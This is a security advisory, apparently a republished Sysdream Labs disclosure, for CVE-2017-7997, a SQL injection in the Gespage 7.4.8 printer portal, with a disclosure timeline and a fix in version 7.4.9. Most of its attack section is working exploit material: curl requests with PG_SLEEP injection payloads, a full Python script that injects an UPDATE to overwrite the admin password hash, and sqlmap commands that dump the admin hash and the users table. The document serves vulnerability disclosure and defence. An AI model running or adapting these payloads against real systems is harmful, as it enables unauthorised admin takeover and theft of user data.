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Gespage 7.4.8 - SQL Injection

🗓️ 05 Jan 2018 00:00:00Reported by SysdreamType 
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Gespage 7.4.8 - SQL Injection vulnerability in web application allows remote attackers to perform SQL code injection through user input parameters, potentially compromising the database. Proof of concept includes executing sleep commands and changing the web admin password using a Python script

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# [CVE-2017-7997] Gespage SQL Injection vulnerability

## Description

Gespage is a web solution providing a printer portal. Official Website:
http://www.gespage.com/

The web application does not properly filter several parameters sent by
users, allowing authenticated SQL code injection (Stacked Queries -
comment).

These vulnerabilities could allow attackers to retrieve / update data
from the database through the application.

**CVE ID**: CVE-2017-7997

**Access Vector**: remote

**Security Risk**: high

**Vulnerability**: CWE-89

**CVSS Base Score**: 8.6

**CVSS Vector String**: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N


### Proof of Concept (dumping database data)

The parameters of these following pages are vulnerable:

* Page: http://URL/ges/webapp/users/prnow.jsp
  Parameter: show_prn
  HTTP Method: Post

* Page: http://URL/ges/webapp/users/blhistory.jsp
  Parameter: show_month
  HTTP Method: Post

* Page: http://URL/ges/webapp/users/prhistory.jsp
  Parameter: show_month
  HTTP Method: Post

We can then detect the SQL Injection by requesting the server with the
curl tool, including a simple payload executing a sleep of different
seconds:

* Normal request:

```
curl --cookie "JSESSIONID=YOUR_COOKIE_HERE" -X POST -d "show_prn=1"
https://172.16.217.134:7181/gespage/webapp/users/prnow.jsp --insecure -w
"\nResponse Time:%{time_total}\n"

Curl output: Response Time:0,122
```

* Sleep Injection of 3 seconds into the request:

```
curl --cookie "JSESSIONID=YOUR_COOKIE_HERE" -X POST -d
"show_prn=1');SELECT PG_SLEEP(3)--"
https://172.16.217.134:7181/gespage/webapp/users/prnow.jsp --insecure -w
"\nResponse Time:%{time_total}\n"

Curl output: Response Time: 3,126
```

* Sleep Injection of 6 seconds into the request:

```
curl --cookie "JSESSIONID=YOUR_COOKIE_HERE" -X POST -d
"show_prn=1');SELECT PG_SLEEP(6)--"
https://172.16.217.134:7181/gespage/webapp/users/prnow.jsp --insecure -w
"\nResponse Time:%{time_total}\n"

Curl output: Response Time: 6,126
```

We created a dedicated python script to change the web admin password in
order to compromise the web application:

```
#!/usr/bin/env python
# -*- coding: utf-8 -*-

"""
$ python update_gespage_pwd.py -c e06d40bc855c98751a5a2ff49daa -i
http://192.168.160.128:7180/gespage -p 12345
[+] Generating the new admin password hash
    => Password hash (sha1) to inject in the Database:
8cb2237d0679ca88db6464eac60da96345513964
[+] Verifying connection to the web interface:
http://192.168.160.128:7180/gespage/
    => Connection OK
[+] Exploiting the SQL injection
    => Vulnerable page:
http://192.168.160.128:7180/gespage/webapp/users/prnow.jsp
    => Posting Data   : show_prn=A-PRINTER-ON-THE-WEB-LIST');UPDATE
param_gespage SET param_value='8cb2237d0679ca88db6464eac60da96345513964'
WHERE param_id='admin_pwd'--
[+] Go to the web admin interface, http://192.168.160.128:7180/admin/
and log on with admin:12345
"""

from argparse import ArgumentParser
from hashlib import sha1
from requests import Session
from urllib3 import disable_warnings


def exploit(args):
    if args.ip_url[-1] != "/":
        args.ip_url += "/"
    print "[+] Generating the new admin password hash"
    new_admin_pwd_hash = sha1(args.password).hexdigest()
    print "    => Password hash (sha1) to inject in the Database: %s" %
(new_admin_pwd_hash)
    print "[+] Verifying connection to the web interface: %s" %
(args.ip_url)
    web_session = web_connection(args.ip_url, args.cookie)
    print "[+] Exploiting the SQL injection"
    sql_injection(args.ip_url, web_session, args.cookie, new_admin_pwd_hash)
    print "[+] Go to the web admin interface, %s and log on with
admin:%s" % (args.ip_url.replace('gespage', 'admin'), args.password)


def sql_injection(url, session, user_cookie, new_admin_pwd_hash):
    vulnerable_url = url + "webapp/users/prnow.jsp"
    sql_update_query = "UPDATE param_gespage SET param_value='%s' WHERE
param_id='admin_pwd'" % (new_admin_pwd_hash)
    sql_injection_payload = "A-PRINTER-ON-THE-WEB-LIST');%s--" %
(sql_update_query)
    print "    => Vulnerable page: %s" % (vulnerable_url)
    print "    => Posting Data   : show_prn=%s" %(sql_injection_payload)
    response = session.post(vulnerable_url,
cookies={"JSESSIONID":user_cookie}, verify=False, allow_redirects=True,
data={"show_prn":sql_injection_payload})
    if not response.status_code == 200:
        print "   There is an error while posting the payload, try with
sqlmap.py"
        exit(2)


def web_connection(url, user_cookie):
    disable_warnings()
    session = Session()
    response = session.get(url, verify=False, allow_redirects=False,
cookies={"JSESSIONID":user_cookie})
    if (response.status_code == 302 and "webapp/user_main.xhtml" in
response.text):
        print "    => Connection OK"
        return session
    else:
        print "    /!\ Error while connecting the web interface with the
specified JSESSIONID cookie"
        print "        => Make sure given application URL and JSESSIONID
cookie are correct "
        exit(1)


if __name__ == '__main__':
    parser = ArgumentParser(description='Exploit Gespage SQL injection
by updating the admin password. You must create then specify an existing
user in order to exploit the vulnerability')
    parser.add_argument('-i','--ip_url', help='The web interface URL,
ex: http://IP_ADDRESS:7181/gespage/',required=True)
    parser.add_argument('-c','--cookie', help='JSESSIONID cookie of an
authenticated user',required=True)
    parser.add_argument('-p','--password', help='New admin
password',required=True)
    exploit(parser.parse_args())

```

Using [sqlmap](https://github.com/sqlmapproject/sqlmap), it is also
possible to dump the content of the database, write other data, etc.

Dumping the admin password hash (if changed from the initial 123456
password):

```
python sqlmap.py -u "https://URL:7181/gespage/users/prnow.jsp"
--cookie="JSESSIONID=YOUR_COOKIE_HERE"
--data="show_prn=A-PRINTER-ON-THE-WEB-LIST" --dbms=PostgreSQL --risk 3
--level 5 --technique TS -D public -T param_gespage -C param_value
--time-sec 2 --dump --flush-session
```

Dumping the users table:

```
sqlmap.py -u "https://URL:7181/gespage/users/prnow.jsp"
--cookie="JSESSIONID=YOU_COOKIE_HERE"
--data="show_prn=A-PRINTER-ON-THE-WEB-LIST" --dbms=PostgreSQL --risk 3
--level 5 --technique TS -D public -T users --time-sec 2 --dump
```


## Timeline (dd/mm/yyyy)

* 06/03/2017 : Initial discovery
* 13/03/2017 : First contact attempt (Web form)
* 21/04/2017 : Second contact attempt (public e-mail address)
* 23/06/2017 : Phone call and successful e-mail contact
* 23/06/2017 : Technical details sent to the editor
* 20/07/2017 : No reply, follow-up e-mail
* 27/07/2017 : Reply: fix planned for major release 7.5.0 in late September
* 17/09/2017 : Informing the editor that we would publish in October
* 3/10/2017 : Feedback from Gespage informing us that the issue has been
fixed with version 7.4.9.
* 02/01/2018 : Release of the advisory

## Fixes

Upgrade to Gespage 7.4.9

## Affected versions

* Versions up to 7.4.8

## Credits

* Mickael KARATEKIN <[email protected]>


-- SYSDREAM Labs <[email protected]> GPG : 47D1 E124 C43E F992 2A2E 1551 8EB4 8CD9 D5B2 59A1 * Website: https://sysdream.com/ * Twitter: @sysdream

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